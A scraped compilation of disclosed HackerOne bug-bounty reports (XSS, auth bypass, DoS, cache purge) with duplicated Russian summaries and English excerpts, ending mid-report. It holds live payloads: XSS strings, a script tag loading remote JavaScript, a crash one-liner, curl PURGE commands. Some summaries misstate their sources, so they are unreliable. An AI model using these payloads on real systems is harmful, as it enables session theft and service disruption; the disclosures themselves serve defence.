https://hackerone.com/reports/615840
Этот репорт описывает уязвимость на сайте https://www.data.gov/, которая позволяет провести атаку XSS (межсайтовый скриптинг). Для эксплуатации уязвимости злоумышленник должен заполнить поля "Заголовок проблемы" и "Описание проблемы" веб-формы на странице https://www.data.gov/issue/ введением XSS-пейлоада, который будет выполнен в административной панели на странице https://labs.data.gov/crm/admin/report/662445.
Эксплойт может привести к краже администраторской сессии, что может позволить злоумышленнику получить полный доступ к сайту и его данным.
Для предотвращения использования этой уязвимости со стороны злоумышленников, необходимо провести проверку вводимых данных на наличие вредоносного кода (например, с помощью фильтрации вводимых символов). Также рекомендуется использование механизмов защиты, таких как Content Security Policy (CSP) и HTTP-only куки.
Этот репорт описывает уязвимость на сайте https://www.data.gov/, которая позволяет провести атаку XSS (межсайтовый скриптинг). Для эксплуатации уязвимости злоумышленник должен заполнить поля "Заголовок проблемы" и "Описание проблемы" веб-формы на странице https://www.data.gov/issue/ введением XSS-пейлоада, который будет выполнен в административной панели на странице https://labs.data.gov/crm/admin/report/662445.
Эксплойт может привести к краже администраторской сессии, что может позволить злоумышленнику получить полный доступ к сайту и его данным.
Для предотвращения использования этой уязвимости со стороны злоумышленников, необходимо провести проверку вводимых данных на наличие вредоносного кода (например, с помощью фильтрации вводимых символов). Также рекомендуется использование механизмов защиты, таких как Content Security Policy (CSP) и HTTP-only куки.
HackerOne
GSA Bounty disclosed on HackerOne: Blind Stored XSS In "Report a...
Step To Produce :
1. Open : https://www.data.gov/issue/
2. fill "Issue Title" and "Description" With XSSHunter Payload
3. XSS Fired In https://labs.data.gov/crm/admin/report/662445
##...
1. Open : https://www.data.gov/issue/
2. fill "Issue Title" and "Description" With XSSHunter Payload
3. XSS Fired In https://labs.data.gov/crm/admin/report/662445
##...
https://hackerone.com/reports/616770
Данный репорт описывает выявленную уязвимость типа Stored XSS в модуле Conversations фреймворка concrete5. Атакующий может внести вредоносный скрипт, который запустится как на стороне клиента, так и на бэкэнде приложения. Для воспроизведения атаки необходимо установить редактор Rich Text в System & Settings->Conversations->Settings и вставить скрипт `<script src="http://bl4de.tech/poc.js"></script>` в поле комментария на странице блога при сохранении, после чего он будет выполнен. Имеется потенциальная возможность для злоумышленника запускать произвольный JavaScript на всех клиентах, использовать CSRF-атаки, а также выполнять любые действия в контексте текущего пользователя в бэкэнде. Уязвимость была проверена в различных браузерах и версиях PHP, Apache и MySQL. Уязвимость имеет серьезный уровень угрозы и, скорее всего, необходимо незамедлительно принимать меры для ее устранения.
Данный репорт описывает выявленную уязвимость типа Stored XSS в модуле Conversations фреймворка concrete5. Атакующий может внести вредоносный скрипт, который запустится как на стороне клиента, так и на бэкэнде приложения. Для воспроизведения атаки необходимо установить редактор Rich Text в System & Settings->Conversations->Settings и вставить скрипт `<script src="http://bl4de.tech/poc.js"></script>` в поле комментария на странице блога при сохранении, после чего он будет выполнен. Имеется потенциальная возможность для злоумышленника запускать произвольный JavaScript на всех клиентах, использовать CSRF-атаки, а также выполнять любые действия в контексте текущего пользователя в бэкэнде. Уязвимость была проверена в различных браузерах и версиях PHP, Apache и MySQL. Уязвимость имеет серьезный уровень угрозы и, скорее всего, необходимо незамедлительно принимать меры для ее устранения.
HackerOne
Concrete CMS disclosed on HackerOne: Stored XSS in Conversations...
Hi concrete5 Team,
**Summary**
I've identified Stored XSS vulnerability in concrete5 **Conversations** module, when Active Conversation Editor is set to "Rich Text". An attacker is able to input...
**Summary**
I've identified Stored XSS vulnerability in concrete5 **Conversations** module, when Active Conversation Editor is set to "Rich Text". An attacker is able to input...
https://hackerone.com/reports/617896
Данный репорт сообщает о уязвимости в интеграции входа через аккаунт Salesforce в Gitlab. Атакующий может зарегистрироваться на Gitlab с произвольным доменом электронной почты, обойдя все ограничения на домены электронной почты (белый и черный списки) и ограничения, которые могут быть настроены сторонними компаниями, использующими Gitlab.
Чтобы воспроизвести ошибку, необходимо зайти на https://bugcrowd-ngalog-3.oktapreview.com/, ввести логин и пароль, нажать кнопку «salesforce», затем в новой вкладке открыть страницу https://gitlab.com/users/sign_in, нажать кнопку «login with salesforce», после чего на странице https://gitlab.com/profile/emails будет доступна возможность зарегистрироваться с произвольным доменом электронной почты.
Эксплуатация данной уязвимости может привести к регистрации на Gitlab с помощью домена электронной почты, который не был бы допущен ограничениями на стороне Gitlab и третьих сторон, что может привести к компрометации ценной информации и нарушению целостности системы.
Данный репорт сообщает о уязвимости в интеграции входа через аккаунт Salesforce в Gitlab. Атакующий может зарегистрироваться на Gitlab с произвольным доменом электронной почты, обойдя все ограничения на домены электронной почты (белый и черный списки) и ограничения, которые могут быть настроены сторонними компаниями, использующими Gitlab.
Чтобы воспроизвести ошибку, необходимо зайти на https://bugcrowd-ngalog-3.oktapreview.com/, ввести логин и пароль, нажать кнопку «salesforce», затем в новой вкладке открыть страницу https://gitlab.com/users/sign_in, нажать кнопку «login with salesforce», после чего на странице https://gitlab.com/profile/emails будет доступна возможность зарегистрироваться с произвольным доменом электронной почты.
Эксплуатация данной уязвимости может привести к регистрации на Gitlab с помощью домена электронной почты, который не был бы допущен ограничениями на стороне Gitlab и третьих сторон, что может привести к компрометации ценной информации и нарушению целостности системы.
HackerOne
GitLab disclosed on HackerOne: Bypass Email Verification using...
### Summary
The salesforce login integration allows attacker to bypass email verification -- user is able to signup with any email domain they want, effectively bypass all email domain...
The salesforce login integration allows attacker to bypass email verification -- user is able to signup with any email domain they want, effectively bypass all email domain...
https://hackerone.com/reports/618031
Этот репорт описывает уязвимость само-ХСС (self-xss) на веб-сайте Shopify. Шаги эксплуатации уязвимости описаны следующим образом:
1. Создать новый продукт и задать имя магазина, которое содержит вредоносный код: '"'><img src=x onerror=alert(domain.domain)>'. Здесь вредоносный код используется в качестве имени магазина.
2. Перейти на страницу «Скидки - Коды», где можно добавить скидочный код. Код использует URL адрес https://mosuan-img-src-x.myshopify.com/admin/discounts/367541518396.
3. Добавить комментарий к выбранному продукту, который был создан на шаге 1.
4. В результате выполнения шагов 1-3, возникает опасность получения персональных данных посетителя сайта, таких как его cookie, и получение удаленного доступа к аккаунту Shopify.
Этот репорт демонстрирует небольшой пример того, как использование вредоносного кода вместо настоящего имени магазина ведет к уязвимости само-ХСС и открытию двери для атакующих на веб-сайте.
Этот репорт описывает уязвимость само-ХСС (self-xss) на веб-сайте Shopify. Шаги эксплуатации уязвимости описаны следующим образом:
1. Создать новый продукт и задать имя магазина, которое содержит вредоносный код: '"'><img src=x onerror=alert(domain.domain)>'. Здесь вредоносный код используется в качестве имени магазина.
2. Перейти на страницу «Скидки - Коды», где можно добавить скидочный код. Код использует URL адрес https://mosuan-img-src-x.myshopify.com/admin/discounts/367541518396.
3. Добавить комментарий к выбранному продукту, который был создан на шаге 1.
4. В результате выполнения шагов 1-3, возникает опасность получения персональных данных посетителя сайта, таких как его cookie, и получение удаленного доступа к аккаунту Shopify.
Этот репорт демонстрирует небольшой пример того, как использование вредоносного кода вместо настоящего имени магазина ведет к уязвимости само-ХСС и открытию двери для атакующих на веб-сайте.
HackerOne
Shopify disclosed on HackerOne: Stored XSS in Discounts section
We recently deployed changes to our discount timelines and @mosuan identified that product names were no longer being properly escaped. This resulted in a stored XSS vulnerability when a product...
https://hackerone.com/reports/619484
В данном репорте описана уязвимость безопасности в приложении Nextcloud, которая позволяет пользователю получить возможность изменять содержимое папки с ограниченными правами доступа. Конкретно, хакер может получить доступ к папке только для чтения, но с помощью API Nextcloud он может повысить свои права на изменение, удаление и добавление файлов в эту папку. После этого злоумышленник может изменить содержимое папки таким образом, чтобы это повлияло на других пользователей, у которых есть доступ к этой папке, например, загрузить другие файлы и тем самым изменить принадлежащие папке файлы на сервере. Это может привести к потенциальному утечке конфиденциальных документов, если папка содержит важные документы организации или другие конфиденциальные данные. Это является серьезной проблемой безопасности и должно быть незамедлительно исправлено.
В данном репорте описана уязвимость безопасности в приложении Nextcloud, которая позволяет пользователю получить возможность изменять содержимое папки с ограниченными правами доступа. Конкретно, хакер может получить доступ к папке только для чтения, но с помощью API Nextcloud он может повысить свои права на изменение, удаление и добавление файлов в эту папку. После этого злоумышленник может изменить содержимое папки таким образом, чтобы это повлияло на других пользователей, у которых есть доступ к этой папке, например, загрузить другие файлы и тем самым изменить принадлежащие папке файлы на сервере. Это может привести к потенциальному утечке конфиденциальных документов, если папка содержит важные документы организации или другие конфиденциальные данные. Это является серьезной проблемой безопасности и должно быть незамедлительно исправлено.
HackerOne
Nextcloud disclosed on HackerOne: User with read-only access to a...
user0 creates folders /test and /test/sub
user0 creates file /test/sub/file.txt
user0 shares folder /test with user1 with read+share permissions (17)
user1 receives the folder /test and can...
user0 creates file /test/sub/file.txt
user0 shares folder /test with user1 with read+share permissions (17)
user1 receives the folder /test and can...
https://hackerone.com/reports/621308
Этот репорт описывает уязвимость в Ruby-подобном языке программирования mruby. Уязвимость возникает при использовании функции `remove_instance_variable`, которая позволяет удалить переменную экземпляра объекта. При передаче функции `remove_instance_variable` некорректных значений появляется возможность вызвать отказ в обслуживании и возможно раскрыть информацию, известную злоумышленнику.
Шаги эксплуатации включают выполнение POC-кода (приложенного в репорте), который перезаписывает адрес экземпляра объекта, что ведет к некорректному чтению памяти и краху программы. Приложение выдает отчет об ошибках, в котором указываются области кода, которые привели к краху и адреса памяти, которые попытались быть прочитаны.
Эта уязвимость может привести к серьезным последствиям для приложения, которое использует mruby, так как она позволяет злоумышленнику вызвать отказ в обслуживании и потенциально получить чувствительную информацию, хранящуюся в памяти программы.
Этот репорт описывает уязвимость в Ruby-подобном языке программирования mruby. Уязвимость возникает при использовании функции `remove_instance_variable`, которая позволяет удалить переменную экземпляра объекта. При передаче функции `remove_instance_variable` некорректных значений появляется возможность вызвать отказ в обслуживании и возможно раскрыть информацию, известную злоумышленнику.
Шаги эксплуатации включают выполнение POC-кода (приложенного в репорте), который перезаписывает адрес экземпляра объекта, что ведет к некорректному чтению памяти и краху программы. Приложение выдает отчет об ошибках, в котором указываются области кода, которые привели к краху и адреса памяти, которые попытались быть прочитаны.
Эта уязвимость может привести к серьезным последствиям для приложения, которое использует mruby, так как она позволяет злоумышленнику вызвать отказ в обслуживании и потенциально получить чувствительную информацию, хранящуюся в памяти программы.
HackerOne
shopify-scripts disclosed on HackerOne: NULL pointer dereference in...
PoC
===
The following demonstrates a crash:
```
3735928559.remove_instance_variable '@a'
```
Debug info
==========
Valgrind suggests the crash happens due to an invalid read in...
===
The following demonstrates a crash:
```
3735928559.remove_instance_variable '@a'
```
Debug info
==========
Valgrind suggests the crash happens due to an invalid read in...
https://hackerone.com/reports/622170
Этот репорт описывает уязвимость в приложении Nextcloud для Windows, в котором используется OpenSSL библиотека с предустановленным файлом конфигурации openssl.cnf, который при запуске приложения ищется в c:\usr\local\ssl\. Поскольку по умолчанию на большинстве систем Windows пользователи с низкими правами имеют возможность создавать файлы в директории c:\, это может быть использовано злоумышленником для создания фальшивого файла openssl.cnf, который загрузит вредоносную .dll библиотеку и вызовет произвольное выполнение кода при запуске приложения. Это может привести к исполнению произвольного кода на уязвимой системе и возможности повышения привилегий до уровня администратора. В репорте также приведены два примера эксплойтов, позволяющих создавать локальных администраторов и выполнять произвольный код. Предложенные рекомендации для исправления проблемы включают перекомпиляцию OpenSSL библиотеки с указанием директории, в которой файл конфигурации будет находиться в недоступном для пользователей с низкими привилегиями месте.
Этот репорт описывает уязвимость в приложении Nextcloud для Windows, в котором используется OpenSSL библиотека с предустановленным файлом конфигурации openssl.cnf, который при запуске приложения ищется в c:\usr\local\ssl\. Поскольку по умолчанию на большинстве систем Windows пользователи с низкими правами имеют возможность создавать файлы в директории c:\, это может быть использовано злоумышленником для создания фальшивого файла openssl.cnf, который загрузит вредоносную .dll библиотеку и вызовет произвольное выполнение кода при запуске приложения. Это может привести к исполнению произвольного кода на уязвимой системе и возможности повышения привилегий до уровня администратора. В репорте также приведены два примера эксплойтов, позволяющих создавать локальных администраторов и выполнять произвольный код. Предложенные рекомендации для исправления проблемы включают перекомпиляцию OpenSSL библиотеки с указанием директории, в которой файл конфигурации будет находиться в недоступном для пользователей с низкими привилегиями месте.
HackerOne
Nextcloud disclosed on HackerOne: Arbitrary code execution in...
Summary:
The nextcloud windows desktop application utilizes a precompiled OpenSSL library called libeay32.dll. This OpenSSL library attempts to load c:\usr\local\ssl\openssl.cnf when the nextcloud...
The nextcloud windows desktop application utilizes a precompiled OpenSSL library called libeay32.dll. This OpenSSL library attempts to load c:\usr\local\ssl\openssl.cnf when the nextcloud...
https://hackerone.com/reports/622864
Этот репорт сообщает о наличии уязвимости в программном обеспечении на устройстве ASA, которая позволяет атакующему производить обход аутентификации и получать доступ к конфиденциальным файлам. Атакующий может использовать это для перечисления структуры директории VPN и получения привилегированного доступа к системе для получения информации о сессии.
Шаги эксплуатации уязвимости включают использование cURL или Burp для перечисления привилегированных директорий и получения конфиденциальной информации.
Рекомендуемым действием для устранения этой уязвимости является обновление программного обеспечения ASA до версии, указанной в соответствующем заявлении о безопасности.
Присутствует высокий уровень воздействия, поскольку данная уязвимость позволяет злоумышленнику перечислять файлы после аутентификации и раскрывать конфиденциальную информацию.
Этот репорт сообщает о наличии уязвимости в программном обеспечении на устройстве ASA, которая позволяет атакующему производить обход аутентификации и получать доступ к конфиденциальным файлам. Атакующий может использовать это для перечисления структуры директории VPN и получения привилегированного доступа к системе для получения информации о сессии.
Шаги эксплуатации уязвимости включают использование cURL или Burp для перечисления привилегированных директорий и получения конфиденциальной информации.
Рекомендуемым действием для устранения этой уязвимости является обновление программного обеспечения ASA до версии, указанной в соответствующем заявлении о безопасности.
Присутствует высокий уровень воздействия, поскольку данная уязвимость позволяет злоумышленнику перечислять файлы после аутентификации и раскрывать конфиденциальную информацию.
HackerOne
U.S. Dept Of Defense disclosed on HackerOne: https://█████████...
Summary:
https:// █████ is an ASA running software vulnerable to CVE-2018-0296 which allows a remote attacker to exploit a path traversal vulnerability and bypass authentication to sensitive files....
https:// █████ is an ASA running software vulnerable to CVE-2018-0296 which allows a remote attacker to exploit a path traversal vulnerability and bypass authentication to sensitive files....
https://hackerone.com/reports/622937
Этот репорт описывает утечку частных IP-адресов через ответ на запрос в Urban Clap. Автор сообщает, что при запросе он обнаружил несколько IP-адресов из частной сети. После исследования он нашел, что эти адреса относятся к частной сети. Автор не уверен в серьезности этого проблемы, но сообщает, что данная информация может помочь злоумышленнику выявить другие уязвимости в будущем.
Шаги для воспроизведения включают загрузку https://www.urbanclap.com и открытие ответа в Burp Suite. В ответе на запрос можно найти упомянутые IP-адреса.
Такая информационная утечка может быть незначительна сама по себе, но может стать частью цепочки, помогающей атакующему получить больше информации о системе и в результате провести более агрессивную атаку.
Этот репорт описывает утечку частных IP-адресов через ответ на запрос в Urban Clap. Автор сообщает, что при запросе он обнаружил несколько IP-адресов из частной сети. После исследования он нашел, что эти адреса относятся к частной сети. Автор не уверен в серьезности этого проблемы, но сообщает, что данная информация может помочь злоумышленнику выявить другие уязвимости в будущем.
Шаги для воспроизведения включают загрузку https://www.urbanclap.com и открытие ответа в Burp Suite. В ответе на запрос можно найти упомянутые IP-адреса.
Такая информационная утечка может быть незначительна сама по себе, но может стать частью цепочки, помогающей атакующему получить больше информации о системе и в результате провести более агрессивную атаку.
HackerOne
Urban Company disclosed on HackerOne: Private ip leaking through...
**Name of Vulnerability:** Information desclosure
**User Details:** +91 ████
**Summary:** Private ip addresses are leaking through response in urban clap.
**Description:**
Hi team.
During my...
**User Details:** +91 ████
**Summary:** Private ip addresses are leaking through response in urban clap.
**Description:**
Hi team.
During my...
https://hackerone.com/reports/623588
Этот репорт описывает уязвимость в PHP версии 7.1.29. Уязвимость связана с методом gdImageCreateFromXbm из файла ext/gd/libgd/gd_xbm.c. Метод содержит строки кода, которые инициализируют переменную "b" неправильно. Если метод sscanf не может прочитать шестнадцатеричное значение, то переменная b будет содержать неинициализированные данные. Это может привести к утечке данных из стека памяти в случае их использования. Уязвимость была обнаружена и зарегистрирована сотрудником HackerOne. Ей был присвоен идентификатор CVE-2019-11038. Компания PHP выпустила исправление уязвимости.
Этот репорт описывает уязвимость в PHP версии 7.1.29. Уязвимость связана с методом gdImageCreateFromXbm из файла ext/gd/libgd/gd_xbm.c. Метод содержит строки кода, которые инициализируют переменную "b" неправильно. Если метод sscanf не может прочитать шестнадцатеричное значение, то переменная b будет содержать неинициализированные данные. Это может привести к утечке данных из стека памяти в случае их использования. Уязвимость была обнаружена и зарегистрирована сотрудником HackerOne. Ей был присвоен идентификатор CVE-2019-11038. Компания PHP выпустила исправление уязвимости.
HackerOne
Internet Bug Bounty disclosed on HackerOne: Uninitialized read in...
This bug is present in gdImageCreateFromXbm method of ext/gd/libgd/gd_xbm.c file.
This method contains below mentioned lines.
```c
...
unsigned int b;
...
sscanf(h, "%x", &b);
for (bit = 1; bit...
This method contains below mentioned lines.
```c
...
unsigned int b;
...
sscanf(h, "%x", &b);
for (bit = 1; bit...
https://hackerone.com/reports/625199
Этот репорт относится к уязвимости в REST API фреймворка Nextcloud для WordPress. С помощью этой уязвимости злоумышленники могут получить информацию обо всех пользователях WordPress, включая их имена и другие данные.
Для воспроизведения атаки злоумышленник должен ввести определенный URL в браузере, который позволит получить доступ к информации о пользователях WordPress.
Если злоумышленник сможет получить доступ к информации об авторах и редакторах Nextcloud, это может привести к серьезным последствиям для этих пользователей. Злоумышленник может использовать эту информацию для атаки методом перебора паролей или других методов.
Поэтому для предотвращения таких атак необходимо обновлять и патчить уязвимые версии WordPress и приложений, которые используют его API. Также рекомендуется использовать сильные пароли, двухфакторную аутентификацию и другие меры безопасности.
Этот репорт относится к уязвимости в REST API фреймворка Nextcloud для WordPress. С помощью этой уязвимости злоумышленники могут получить информацию обо всех пользователях WordPress, включая их имена и другие данные.
Для воспроизведения атаки злоумышленник должен ввести определенный URL в браузере, который позволит получить доступ к информации о пользователях WordPress.
Если злоумышленник сможет получить доступ к информации об авторах и редакторах Nextcloud, это может привести к серьезным последствиям для этих пользователей. Злоумышленник может использовать эту информацию для атаки методом перебора паролей или других методов.
Поэтому для предотвращения таких атак необходимо обновлять и патчить уязвимые версии WordPress и приложений, которые используют его API. Также рекомендуется использовать сильные пароли, двухфакторную аутентификацию и другие меры безопасности.
HackerOne
Nextcloud disclosed on HackerOne: Wordpress Users Disclosure
**Information**
Using REST API, we can see all the WordPress users/author with some of their information.
**Step to Reproduce**
You can get user info by entering below url in your browser:...
Using REST API, we can see all the WordPress users/author with some of their information.
**Step to Reproduce**
You can get user info by entering below url in your browser:...
https://hackerone.com/reports/625546
Данный репорт описывает найденную уязвимость в форме подтверждения аккаунта на unikoingold.com, которая позволяет провести открытый редирект. Автор репорта создал аккаунт, заполнил все необходимые поля, прошел до последнего шага подтверждения аккаунта и получил письмо со ссылкой для подтверждения. Затем он перехватил запрос в Burp Suite и обнаружил уязвимость в параметре "l" ссылки. Изменяя значение этого параметра, он смог осуществить редирект на злоумышленный сайт и выполнить на нем скрипт с XSS-уязвимостью.
Эксплуатация данной уязвимости может привести к утечке учетных данных пользователя, так как происходит переход на злоумышленный сайт, где может быть выполнен опасный скрипт. Это может быть использовано для проведения фишинговой атаки на пользователей сайта.
Данный репорт описывает найденную уязвимость в форме подтверждения аккаунта на unikoingold.com, которая позволяет провести открытый редирект. Автор репорта создал аккаунт, заполнил все необходимые поля, прошел до последнего шага подтверждения аккаунта и получил письмо со ссылкой для подтверждения. Затем он перехватил запрос в Burp Suite и обнаружил уязвимость в параметре "l" ссылки. Изменяя значение этого параметра, он смог осуществить редирект на злоумышленный сайт и выполнить на нем скрипт с XSS-уязвимостью.
Эксплуатация данной уязвимости может привести к утечке учетных данных пользователя, так как происходит переход на злоумышленный сайт, где может быть выполнен опасный скрипт. Это может быть использовано для проведения фишинговой атаки на пользователей сайта.
HackerOne
Unikrn disclosed on HackerOne: Open Redirection leads to redirect...
---
Summary
---
I found an open redirect bug on unikoingold.com .First, I create an account on unikoingold.com , I fill all the forms with the required information (First name,Birth,etc...), until...
Summary
---
I found an open redirect bug on unikoingold.com .First, I create an account on unikoingold.com , I fill all the forms with the required information (First name,Birth,etc...), until...
https://hackerone.com/reports/626082
Этот репорт сообщает о наличии уязвимости типа stored XSS в NR One через dashboard builder. Уязвимость позволяет атакующему запустить код (payload), который выполнится на странице, куда была вставлена ссылка на этот код. Для воспроизведения этой уязвимости необходимо выполнить следующие шаги:
1. Перейти в chart builder в NR One.
2. Переключиться в режим NRQL.
3. Вставить следующий NRQL-запрос в поле поиска:
```SELECT `“><img src=x onerror=alert(document.domain)> "' Style=position` FROM SyntheticCheck```
4. Нажать Enter.
5. Кликнуть на кнопку "My recent queries".
6. Будет запущен payload.
Эту уязвимость можно использовать для атаки на других пользователей, отправив им ссылку на payload в адресной строке. Это работает потому, что параметр overlay в этой ссылке закодирован Base64 и содержит payload в запросе.
Уязвимость может привести к исполнению произвольного кода в браузере пользователя или к краже данных из веб-приложения.
Этот репорт сообщает о наличии уязвимости типа stored XSS в NR One через dashboard builder. Уязвимость позволяет атакующему запустить код (payload), который выполнится на странице, куда была вставлена ссылка на этот код. Для воспроизведения этой уязвимости необходимо выполнить следующие шаги:
1. Перейти в chart builder в NR One.
2. Переключиться в режим NRQL.
3. Вставить следующий NRQL-запрос в поле поиска:
```SELECT `“><img src=x onerror=alert(document.domain)> "' Style=position` FROM SyntheticCheck```
4. Нажать Enter.
5. Кликнуть на кнопку "My recent queries".
6. Будет запущен payload.
Эту уязвимость можно использовать для атаки на других пользователей, отправив им ссылку на payload в адресной строке. Это работает потому, что параметр overlay в этой ссылке закодирован Base64 и содержит payload в запросе.
Уязвимость может привести к исполнению произвольного кода в браузере пользователя или к краже данных из веб-приложения.
HackerOne
New Relic disclosed on HackerOne: Stored XSS via "my recent...
This is a pretty simple one.
Within NR One, there is a stored XSS via the dashboard builder. It appears in the "My recent queries" dropdown. You can attack other users with this bug by having...
Within NR One, there is a stored XSS via the dashboard builder. It appears in the "My recent queries" dropdown. You can attack other users with this bug by having...
https://hackerone.com/reports/627245
Этот репорт описывает уязвимость в функции header_append библиотеки CURL, которая может быть использована для выполнения атаки на удаленный сервер. Эксплойт может быть запущен через злонамеренный сервер, который подает большой заголовок и передает скомпрометированный ответ, содержащий код, который может быть выполнен на целевой системе. Также может быть использован специальный аргумент при запуске самой утилиты CURL или через CURL API. Уязвимость заключается в несанкционированном обращении к памяти, и может привести к удаленному выполнению кода на целевой системе. Исправление заключается в проверке длины заголовка перед его обработкой в функции header_append. Однако, поскольку патч еще не был выпущен, рекомендуется осторожность при использовании библиотеки CURL и по возможности ограничить передачу больших заголовков.
Этот репорт описывает уязвимость в функции header_append библиотеки CURL, которая может быть использована для выполнения атаки на удаленный сервер. Эксплойт может быть запущен через злонамеренный сервер, который подает большой заголовок и передает скомпрометированный ответ, содержащий код, который может быть выполнен на целевой системе. Также может быть использован специальный аргумент при запуске самой утилиты CURL или через CURL API. Уязвимость заключается в несанкционированном обращении к памяти, и может привести к удаленному выполнению кода на целевой системе. Исправление заключается в проверке длины заголовка перед его обработкой в функции header_append. Однако, поскольку патч еще не был выпущен, рекомендуется осторожность при использовании библиотеки CURL и по возможности ограничить передачу больших заголовков.
HackerOne
curl disclosed on HackerOne: Integer overlow in "header_append"...
## Summary:
The function header_append contains an integer overflow, it can bypass the check on the length and can lead to a subsequent heap buffer overflow.
## Steps To Reproduce:
I don't have...
The function header_append contains an integer overflow, it can bypass the check on the length and can lead to a subsequent heap buffer overflow.
## Steps To Reproduce:
I don't have...
https://hackerone.com/reports/627376
Этот репорт описывает уязвимость в модуле http-live-simulator версии 1.0.7, которая позволяет атакующему абстурдным образом привести к падению сервера. Исправление предыдущей уязвимости привело к новой, и если отправить на сервер запрос с URL-адресом `http://localhost:8080/../?a`, то значение поля `pathname` станет пустым, что приведет к обходу необходимой проверки и вызовет ошибку из-за неправильного использования функции `res.write()`, которая должна принимать только строки или буферы, а в данном случае она получит значение `undefined`.
Для эксплуатации уязвимости атакующему нужно установить модуль http-live-simulator версии 1.0.7, запустить сервер и отправить специально сформированный запрос. Это может привести к отказу в обслуживании.
Для исправления уязвимости разработчику необходимо добавить проверку и добавление `/` к `pathname` в случае если оно стало пустым после проверки.
Этот репорт описывает уязвимость в модуле http-live-simulator версии 1.0.7, которая позволяет атакующему абстурдным образом привести к падению сервера. Исправление предыдущей уязвимости привело к новой, и если отправить на сервер запрос с URL-адресом `http://localhost:8080/../?a`, то значение поля `pathname` станет пустым, что приведет к обходу необходимой проверки и вызовет ошибку из-за неправильного использования функции `res.write()`, которая должна принимать только строки или буферы, а в данном случае она получит значение `undefined`.
Для эксплуатации уязвимости атакующему нужно установить модуль http-live-simulator версии 1.0.7, запустить сервер и отправить специально сформированный запрос. Это может привести к отказу в обслуживании.
Для исправления уязвимости разработчику необходимо добавить проверку и добавление `/` к `pathname` в случае если оно стало пустым после проверки.
HackerOne
Node.js third-party modules disclosed on HackerOne: Application...
## Module
**module name:** http-live-simulator
**version:** 1.0.7
**npm page:** https://www.npmjs.com/package/http-live-simulator
## Description
I've found a way to crash the server due to the way...
**module name:** http-live-simulator
**version:** 1.0.7
**npm page:** https://www.npmjs.com/package/http-live-simulator
## Description
I've found a way to crash the server due to the way...
https://hackerone.com/reports/629087
Этот репорт описывает уязвимость в SPF записи (это запись в DNS, которая указывает, какие IP-адреса могут отправлять почту от имени домена), обнаруженную в сайте chainlink.com. Уязвимость заключается в том, что текущая SPF запись не предотвращает подделку отправителя почты и позволяет злоумышленнику отправить фальшивое письмо от имени этого домена.
Для решения этой уязвимости автор рекомендует заменить значение "~all" на "-all" в SPF записи. Это заставит почтовые сервера отвергать любое письмо, которое не было отправлено с полномочиями владельца домена.
Если уязвимость не будет устранена, злоумышленник может отправлять фишинговые или спам-письма от имени chainlink.com, что может привести к финансовым потерям или компрометации пользователей этого сайта.
Этот репорт описывает уязвимость в SPF записи (это запись в DNS, которая указывает, какие IP-адреса могут отправлять почту от имени домена), обнаруженную в сайте chainlink.com. Уязвимость заключается в том, что текущая SPF запись не предотвращает подделку отправителя почты и позволяет злоумышленнику отправить фальшивое письмо от имени этого домена.
Для решения этой уязвимости автор рекомендует заменить значение "~all" на "-all" в SPF записи. Это заставит почтовые сервера отвергать любое письмо, которое не было отправлено с полномочиями владельца домена.
Если уязвимость не будет устранена, злоумышленник может отправлять фишинговые или спам-письма от имени chainlink.com, что может привести к финансовым потерям или компрометации пользователей этого сайта.
HackerOne
Chainlink disclosed on HackerOne: No Valid SPF Records.
Hiii,
There is any issue No valid SPF Records
Desciprition :
There is a email spoofing vulnerability.Email spoofing is the forgery of an email header so that the message appears to have...
There is any issue No valid SPF Records
Desciprition :
There is a email spoofing vulnerability.Email spoofing is the forgery of an email header so that the message appears to have...
https://hackerone.com/reports/629150
В данном репорте исследователь сообщает о найденной им уязвимости на платформе Shopify, позволяющей любому пользователю отключить комментарии на скидках для всех сотрудников магазина, включая администратора. Он объясняет, что это происходит из-за применения `GraphQL` для создания комментария, который содержит **тег страницы ссылки** для другого магазина, что приводит к ошибке внутренней системы, влияющей на отключение комментариев на скидках для всех в магазине. В репорте представлены шаги воспроизведения проблемы, а также пример GraphQL запроса и видео, демонстрирующее это поведение.
Это может привести к отключению комментариев на скидках для всех сотрудников магазина, что может привести к недостаточной обратной связи и снижению продаж. Кроме того, у злоумышленника, имеющего доступ к системе, могут возникнуть возможности для вредоносной деятельности. В целом, данная уязвимость представляет серьезный риск для безопасности и операционной деятельности интернет-магазинов, использующих платформу Shopify.
В данном репорте исследователь сообщает о найденной им уязвимости на платформе Shopify, позволяющей любому пользователю отключить комментарии на скидках для всех сотрудников магазина, включая администратора. Он объясняет, что это происходит из-за применения `GraphQL` для создания комментария, который содержит **тег страницы ссылки** для другого магазина, что приводит к ошибке внутренней системы, влияющей на отключение комментариев на скидках для всех в магазине. В репорте представлены шаги воспроизведения проблемы, а также пример GraphQL запроса и видео, демонстрирующее это поведение.
Это может привести к отключению комментариев на скидках для всех сотрудников магазина, что может привести к недостаточной обратной связи и снижению продаж. Кроме того, у злоумышленника, имеющего доступ к системе, могут возникнуть возможности для вредоносной деятельности. В целом, данная уязвимость представляет серьезный риск для безопасности и операционной деятельности интернет-магазинов, использующих платформу Shopify.
HackerOne
Shopify disclosed on HackerOne: any staff members have the ability...
@modam3r5 discovered an issue where an attacker could disable the Timeline section associated with a discount code by referencing a non-existent product variant in a comment, which resulted a...
https://hackerone.com/reports/629612
В данном репорте участник сообщества HackerOne информирует команду Yelp о наличии уязвимости в инфраструктуре компании, что может приводить к несанкционированному сбросу кэша и увеличению затрат на пропускную способность. В частности, участник сообщает о том, что возможно отправить запрос на инвалидацию кеша для любого ресурса без необходимости авторизации.
После этого участник приводит последовательность шагов, показывающих, как это можно сделать. Первый запрос на проверку заголовков ресурса (`curl https://s3-media0.fl.yelpcdn.com/assets/public/pride@2x.yelp_design_web.yji-629fce3629585b9db2137d9353196628.png --head`) показывает, что кэш для данного ресурса на стороне хостинга сохранен (`X-Cache-Hits: 1, 14`). Затем демонстрируется возможность инвалидации кэша (`curl https://s3-media0.fl.yelpcdn.com/assets/public/pride@2x.yelp_design_web.yji-629fce3629585b9db2137d9353196628.png --head -XPURGE`). В результате подобного запроса каталог в кэше очищается, что подтверждают заголовки (`X-Cache-Hits: 1, 0`).
По мнению автора репорта, данный метод может привести к дополнительным затратам на пропускную способность.
В данном репорте участник сообщества HackerOne информирует команду Yelp о наличии уязвимости в инфраструктуре компании, что может приводить к несанкционированному сбросу кэша и увеличению затрат на пропускную способность. В частности, участник сообщает о том, что возможно отправить запрос на инвалидацию кеша для любого ресурса без необходимости авторизации.
